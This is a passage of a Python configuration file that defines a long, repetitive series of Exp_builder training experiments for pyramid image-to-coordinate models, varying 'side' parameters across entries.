ch032_1side_3__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 "10" 15 21 28 36 45 55
# side4 OK 20
ch032_1side_4__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 10 "15" 21 28 36 45 55
# side5 OK 35
ch032_1side_5__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
